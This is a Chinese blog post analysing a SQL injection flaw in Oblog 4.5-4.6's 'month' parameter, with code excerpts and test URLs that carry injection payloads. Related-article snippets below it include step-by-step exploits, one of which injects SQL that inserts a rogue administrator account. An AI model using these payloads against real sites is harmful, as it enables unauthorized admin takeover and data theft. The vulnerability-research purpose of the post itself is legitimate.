Oblog最新注入漏洞分析

最新推荐文章于 2024-08-04 20:46:31 发布
最新推荐文章于 2024-08-04 20:46:31 发布
阅读量754 收藏
点赞数
文章标签: 代码分析 sql date 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackiis/article/details/2914115
版权
 Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName = G_P_FileName & "month&month=" & strMonth strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01" mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then LastDay = "31"…… Else //第109行 SqlPart = " And Addtime >=’"&strMonth&"01’ AND Addtime < ’"&strMonth&LastDay&"’ " 构造合适的变量strMonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为: http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.Open strSql,Conn,1,1 不能修改记录集
hackiis
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oblog4.60漏洞
06-28
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 1、注册一个用户,用户名script,密码123456 2、发布一篇日志,日志标题:测试一下 3、个人前台首页找到日志"测试一下",点"推荐" 4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成: s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);-- 5、最后点"确认提交"按钮,如果提示修改成功,注入完成! 6、登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功! 转的
OBLOG4.0 OBLOG4.5漏洞利用分析
10-30
然而,OBLOG4.0与OBLOG4.5版本中存在一个较为严重的安全漏洞,即SQL注入漏洞。这种漏洞如果被恶意利用,可能导致数据泄露、服务器被控制等严重后果。 #### 二、漏洞详情分析 ##### 漏洞文件:`js.asp` 该漏洞主要...
Oblog博客系统存在SQL注入漏洞http://www.anqn.com 
jahn的专栏
10-28 835
以下是代码片段: Infos: 漏洞预警中心小组漏洞预警公告(BCTWR0701)Author: 疯子Date: 26/10/2007Bug.Center.Team(http://www.cnbct.org)oblog存在SQL注入漏洞发布日期:2007-10-26综述:======根据我们针对
Oblog4.5跨站漏洞
jahn的专栏
10-17 812
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)oblog这套程序大家应该都很熟悉了吧,它凭着它的简洁、安全、稳定成为国内多用户blog的首选。这天无聊,就下了套上个月才出的oblog4.5最新版来看代码,谁知,居然看出了N多XSS点。    首先给大家看一个另类点的跨站点,虽然利用价值不大,但是我觉得跨这个点的思路大家可以学习下。我们来看upload.asp和user_
oblog商业版本4.6注射漏洞,直接拿管理员
weixin_30902251的博客
08-05 109
漏洞描述:通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞漏洞文件:AjaxServer.asp变量:log_files语句:log_files=Replace(log_files," ","")If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)rs("logpics") = log...
Oblog 2.52导出日志最新漏洞
得峰的专栏 [网络收藏]
05-11 822
/**作者:慈勤强 Http://blog.csdn.net/cqq
oblog4.6 最新版本
06-23
它采用了最新的安全策略,包括防止SQL注入、XSS攻击等,保障了用户数据的安全。同时,系统定期更新,修复已知漏洞,增强了系统的稳定性。 总的来说,OBLOG4.6凭借其ASP+Access的技术组合,丰富的功能特性,以及对...
oblog_4.6_SQL 语句
10-30
这些SQL语句是针对一个名为"oblog_4.6"的应用程序或博客平台的数据库进行操作的。让我们详细讨论一下其中涉及的知识点。 1. **SQL 语言基础**: SQL(Structured Query Language)是用于管理和处理关系数据库的...
网摘插件 for Oblog4.0.rar
07-03
插件for Oblog IIS管理器上依次选 网站 属性 http头 mime类型 新建 .reg application/ms-download 添加后就可以直接下载reg文件了. _by 蓝色
关于Oblog 2.52 help.asp漏洞的修补问题
得峰的专栏 [网络收藏]
05-11 806
关于Oblog 2.52 help.asp漏洞的修补问题 这是一件很有意思的事情。 OBlog是一套基于asp的Blog系统,目前的版本是2.52吧。 前些日子,出现了个help.asp文件漏洞, 可以查看任意文件的
惊爆Oblog4.6 的0day
weixin_33892359的博客
12-14 102
此文章已发表在《***X档案》第11期杂志上如需转载,请务必保留此信息! 作者:zj1244&amp;竹子    自从上次oblog的tb.asp和js.asp文件出现漏洞后,直至今日oblog都没有爆出什么安全问题,前些日子官方发布了4.6稳定版,趁着无聊下下来看看代码的安全性,没想到还真的发现了一些问题。后来联系了oblog的客服,可是在qq上验证了几次人家也没有理我,没办...
Oblog的一些整理
weixin_30918415的博客
06-19 172
1、显示,help/h_main.htm的内容,格式:http://test/blog/user_help.asp?file=help/h_whatblog.htm,如果换成asp文件是不是也可以显示?从代码中可以看出,不允许读扩展名为asp的文件,但是对别扩展名没有限制,我们只想要asp文件的内容,windowns不区分文件的大小写,我们把小写的asp换成大写的ASP,读取oBlog的数据库连接...
轻松获得oblog2.52的WebShell
得峰的专栏 [网络收藏]
05-11 810
                              一、方法                               1、先进后台。利用CheckUserLogined漏洞直接加个后台管理员。关于这个CheckUserLogined漏洞我在《Blog的噩梦》(http://www.eviloctal.com/forum/htm_data/10/0508/13721.html)中有详
Oblog 4.5-4.6 access&mssql getshell 0day
收集盒 Book box
07-02 463
影响范围:4.5 - 4.6 漏洞需求: IIS6.0\开启会员 挖掘作者:henry   绝对原创,技术含量不高,但影响范围比较广..   漏洞文件: AjaxServer.asp (372行) log_filename = Trim(Request("filename"))//未过滤自定义文件名   AjaxServer.asp (259行)(关键) If (oblo
postgresql 双重排序后 重复项 标识次序
cuisidong1997的博客
08-04 140
在这个查询中,ROW_NUMBER()会为每个product_id分组内的行分配一个唯一的sale_sequence。PARTITION BY product_id表示按product_id分组,ORDER BY sale_date表示在每个分组内按sale_date排序。最外层的ORDER BY product_id, sale_date确定了查询结果的最终排序。一个常见的方法是使用ROW_NUMBER()窗口函数,它会为每个分组内的行分配一个唯一的序号。
Flink学习之Flink SQL
最新发布
m0_58050808的博客
08-04 790
启动yarn-session启动Flink SQL客户端测试重启SQL客户端之后,需要重新建表。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值